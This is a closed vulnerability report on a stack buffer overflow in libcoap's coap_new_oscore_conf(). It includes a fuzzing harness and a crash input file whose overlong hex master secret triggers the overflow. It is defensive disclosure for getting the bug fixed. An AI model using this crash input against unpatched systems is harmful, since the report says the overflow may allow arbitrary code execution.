Closed
Description
Environment
- Build System: [Make]
- Operating System: [Linux]
- Operating System Version: [Ubuntu 20.04]
- Hosted Environment: [None]
Report
- [1] Vulnerabilities:
Stack-buffer-overflow in libcoap.
- [2] Affected Versions:
Unspecified version (additional versions could also be affected).
- [3] Vulnerability Type:
CWE-121: Stack Based Buffer Overflow
- [4] Vendor of Product:
Libcoap
- [5] Attack Type:
Local.
- [6] Impact:
Potential crash or code execution: the overflow may permit an attacker to execute arbitrary code on affected installations.
- [7] Mitigation:
The overflow occurs while the coap_new_oscore_conf() function handles the contents of an input file. Proper bounds checking of that input can provide a potential fix.
- [8] Reproducing the Issue:
file overflow-1.c
//
// Created by msxfxf on 24-1-24.
//
// afl-clang-fast overflow-1.c -v -I../include -I../ -lssl -lcrypto ../libcoap/.libs/libcoap-3-openssl.a -g -fsanitize=address -o overflow
#include "fcntl.h"
#include "unistd.h"
#include "coap3/coap_internal.h"
#include "oscore/oscore.h"
#include "oscore/oscore_context.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_LEN 1024
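/*
 * Fuzzer entry point: hands the raw input bytes to coap_new_oscore_conf()
 * as an OSCORE configuration string, then releases whatever was created.
 *
 * Inputs that are empty or longer than MAX_LEN are skipped.
 * Always returns 0.
 */
int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) {
    coap_context_t ctx[1];
    coap_oscore_conf_t *oscore_conf;

    if (Size < 1 || Size > MAX_LEN)
        return 0;

    /* Length-delimited view of the input; Data is not guaranteed to be
     * NUL-terminated, so only Size bytes may be read from it. */
    const coap_str_const_t conf = { Size, Data };

    memset(&ctx, 0, sizeof(ctx));

    /* Parser under test: the report attributes the stack overflow to the
     * handling of the configuration text inside this call. */
    oscore_conf = coap_new_oscore_conf(conf, NULL, NULL, 0);

    oscore_free_contexts(ctx);

    /* NOTE(review): oscore_conf may be NULL if the configuration was
     * rejected; presumably coap_delete_oscore_conf() accepts NULL - confirm. */
    coap_delete_oscore_conf(oscore_conf);
    return 0;
}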
#ifndef TESTING
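/*
 * Stand-alone driver: passes up to MAX_LEN bytes of the file named on the
 * command line to LLVMFuzzerTestOneInput(), so a saved fuzzer input can be
 * replayed without a fuzzing engine.
 *
 * Returns 0 after replaying the input (and, as before, after printing the
 * usage message); returns 1 if the file cannot be opened or read.
 */
int main(int argc, char **argv)
{
    uint8_t Data[MAX_LEN];
    ssize_t nread;
    int fd;

    if (argc != 2) {
        printf("Usage: %s <file>\n", argv[0]);
        return 0;
    }

    fd = open(argv[1], O_RDONLY);
    if (fd < 0) {
        perror("Error opening file");
        return 1;
    }

    /*
     * read() returns -1 on failure. Keep the result signed so the error is
     * caught here instead of wrapping to a huge size_t that would be printed
     * and passed on as the input length.
     */
    nread = read(fd, Data, sizeof Data);
    if (nread < 0) {
        perror("Error reading file");
        close(fd);
        return 1;
    }
    close(fd);

    /* %zu is the matching conversion for size_t; %lu is not portable. */
    printf("Read %zu bytes from %s\n", (size_t)nread, argv[1]);
    LLVMFuzzerTestOneInput(Data, (size_t)nread);
    return 0;
}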
#endif
file: crash0
#astsi0
hem,hex_aster_secret,hex,"0102030405060708090a0b0c0d0e0f1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111$11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111110"
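Command: ./overflow-1 ./crash0 (the build line in overflow-1.c writes the binary to `overflow`, so use whichever name your build produced).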
Screenshot:
